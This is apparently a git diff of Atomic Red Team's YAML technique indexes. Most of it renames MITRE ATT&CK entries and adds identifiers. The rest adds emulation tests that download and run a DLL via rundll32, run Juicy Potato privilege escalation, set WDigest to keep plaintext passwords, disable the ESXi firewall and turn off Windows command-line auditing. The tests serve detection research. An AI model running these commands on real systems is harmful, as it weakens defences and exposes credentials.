         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -26204,6 +26206,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -29478,7 +29481,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29530,6 +29533,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -34795,6 +34799,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -36405,7 +36410,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -36427,6 +36432,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/iaas-index.yaml b/atomics/Indexes/iaas-index.yaml
index 8691b2b7..bb19a56d 100644
--- a/atomics/Indexes/iaas-index.yaml
+++ b/atomics/Indexes/iaas-index.yaml
@@ -1264,7 +1264,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -1339,6 +1339,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -23836,6 +23837,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -26013,7 +26015,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -26088,6 +26090,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -29362,7 +29365,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29414,6 +29417,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -34621,6 +34625,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -36231,7 +36236,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -36253,6 +36258,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/iaas_aws-index.yaml b/atomics/Indexes/iaas_aws-index.yaml
index 03306273..4c7b31c4 100644
--- a/atomics/Indexes/iaas_aws-index.yaml
+++ b/atomics/Indexes/iaas_aws-index.yaml
@@ -1264,7 +1264,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -1339,6 +1339,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -24207,6 +24208,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -26384,7 +26386,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -26459,6 +26461,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -29733,7 +29736,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29785,6 +29788,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -35094,6 +35098,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -36704,7 +36709,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -36726,6 +36731,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/iaas_azure-index.yaml b/atomics/Indexes/iaas_azure-index.yaml
index 2f3a9898..c3df25e9 100644
--- a/atomics/Indexes/iaas_azure-index.yaml
+++ b/atomics/Indexes/iaas_azure-index.yaml
@@ -1264,7 +1264,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -1339,6 +1339,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -24231,6 +24232,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -26408,7 +26410,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -26483,6 +26485,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -29757,7 +29760,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29809,6 +29812,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -35252,6 +35256,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -36862,7 +36867,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -36884,6 +36889,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/iaas_gcp-index.yaml b/atomics/Indexes/iaas_gcp-index.yaml
index 4a5726e3..b4b7260a 100644
--- a/atomics/Indexes/iaas_gcp-index.yaml
+++ b/atomics/Indexes/iaas_gcp-index.yaml
@@ -1264,7 +1264,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -1339,6 +1339,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -24185,6 +24186,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -26362,7 +26364,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -26437,6 +26439,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -29711,7 +29714,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29763,6 +29766,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -35161,6 +35165,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -36771,7 +36776,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -36793,6 +36798,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index af1bd369..2a1a04b7 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -684,6 +684,35 @@ defense-evasion:
           copy #{exe_to_launch} not_an_scr.scr
           rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
         cleanup_command: del not_an_scr.scr
+    - name: Running DLL with .init extension and function
+      auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
+      description: |
+        This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+        DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_file:
+          description: The DLL file to be called
+          type: string
+          default: PathToAtomicsFolder\T1218.011\bin\_WT.init
+        dll_url:
+          description: The URL to the DLL file that must be downloaded
+          type: url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
+      dependency_executor_name: powershell
+      dependencies:
+      - description: The DLL file to be called must exist at the specified location
+          (#{dll_file})
+        prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+      executor:
+        command: 'rundll32.exe #{dll_file},krnl
+
+          '
+        name: command_prompt
   T1027.009:
     technique:
       modified: '2023-09-29T21:14:57.263Z'
@@ -3086,7 +3115,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -3161,7 +3190,24 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-    atomic_tests: []
+      identifier: T1542.001
+    atomic_tests:
+    - name: UEFI Persistence via Wpbbin.exe File Creation
+      auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+      description: |
+        Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+        - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+        - http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+        - https://github.com/tandasat/WPBT-Builder
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: "echo \"Creating %systemroot%\\wpbbin.exe\"      \nNew-Item -ItemType
+          File -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        cleanup_command: "echo \"Removing %systemroot%\\wpbbin.exe\" \nRemove-Item
+          -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        elevation_required: true
   T1574.011:
     technique:
       modified: '2023-03-30T21:01:38.651Z'
@@ -11130,6 +11176,48 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: ESXi - Disable Firewall via Esxcli
+      auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a
+      description: 'Adversaries may disable the ESXI firewall via ESXCLI
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m
+          PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n"
+        cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password}
+          -m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n"
+        name: command_prompt
+        elevation_required: false
   T1553.003:
     technique:
       x_mitre_platforms:
@@ -11956,6 +12044,24 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: Use Powershell to Modify registry to store logon credentials
+      auto_generated_guid: 68254a85-aa42-4312-a695-38b7276307f8
+      description: |
+        Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
+        Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Set-ItemProperty -Force -Path  ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
+          -Name  ''UseLogonCredential'' -Value ''1'' -ErrorAction Ignore
+
+          '
+        cleanup_command: 'Set-ItemProperty -Force -Path  ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
+          -Name  ''UseLogonCredential'' -Value ''0'' -ErrorAction Ignore
+
+          '
+        name: powershell
+        elevation_required: true
     - name: Add domain to Trusted sites Zone
       auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
       description: |
@@ -17715,6 +17821,53 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+    - name: Juicy Potato
+      auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
+      description: "This Atomic utilizes Juicy Potato to obtain privilege escalation.
+        \nUpon successful execution of this test, a vulnerable CLSID will be used
+        to execute a process with system permissions.\nThis tactic has been previously
+        observed in SnapMC Ransomware, amongst numerous other campaigns. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)"
+      supported_platforms:
+      - windows
+      input_arguments:
+        potato_path:
+          description: Path to the JuicyPotato.exe file
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe
+        listening_port:
+          description: COM server listen port
+          type: integer
+          default: 7777
+        target_exe:
+          description: Target executable to launch with system privileges
+          type: path
+          default: "$env:windir\\system32\\notepad.exe"
+        target_CLSID:
+          description: Vulnerable CLSID to impersonate privileges
+          type: string
+          default: "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'JuicyPotato.exe must exist on disk
+
+          '
+        prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+      executor:
+        command: 'cmd /c ''#{potato_path}'' -l ''#{listening_port}'' -t * -p ''#{target_exe}''
+          -c ''#{target_CLSID}''
+
+          '
+        cleanup_command: |
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+        name: powershell
+        elevation_required: true
   T1205.001:
     technique:
       x_mitre_platforms:
@@ -18055,7 +18208,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -18340,6 +18493,67 @@ defense-evasion:
         cleanup_command: 'unset HISTIGNORE
 
           '
+    - name: Disable Windows Command Line Auditing using reg.exe
+      auto_generated_guid: 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+          Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          echo Commencing Attack - Disabling Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          echo Commencing Cleanup - Restoring Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+    - name: Disable Windows Command Line Auditing using Powershell Cmdlet
+      auto_generated_guid: 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+          Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+        https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          echo "Commencing Attack - Disabling Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+        cleanup_command: |
+          echo "Commencing Cleanup - Restoring Registry Value"
